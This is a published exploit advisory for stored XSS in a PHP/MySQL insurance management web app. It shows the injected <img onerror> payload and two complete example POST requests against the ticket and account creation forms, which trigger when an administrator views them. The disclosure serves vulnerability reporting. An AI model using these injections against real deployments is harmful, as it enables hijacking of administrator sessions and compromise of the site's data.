Insurance Management System PHP And MySQL 1.0 Cross Site Scripting

2024.03.26
Credit: Hakki Toklu
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title:Insurance Management System PHP and MySQL 1.0 - Multiple Stored XSS # Date: 2024-02-08 # Exploit Author: Hakkı TOKLU # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html # Version: 1.0 # Tested on: Windows 11 / PHP 8.1 & XAMPP 3.3.0 Support Ticket Click on Support Tickets > Generate and add payload <img src=x onerror=prompt("xss")> to Subject and Description fields, then send the request. When admin visits the Support Tickets page, XSS will be triggered. Example Request : POST /e-insurance/Script/user/core/new_ticket HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 139 Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15; __insuarance__logged=1; __insuarance__key=LG3LFIBJCN9DKVXKYS41 category=4&subject=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&description=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&submit=1 Create Account Click on New Account button on login page, then fill the fields. Inject <img src=x onerror=prompt("xss")> payloads to fname, lname, city and street parameter, then click Create Account button. XSS will be triggered when admin visits Users page. Example Request : POST /e-insurance/Script/core/new_account HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: 303 Cookie: PHPSESSID=17ot0ij8idrm2br6mmmc54fg15 fname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&lname=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&gender=Male&phone=5554443322&city=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&street=%3Cimg+src%3Dx+onerror%3Dprompt%28%22xss%22%29%3E&email=test1%40test.com&password=Test12345&submit=1


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top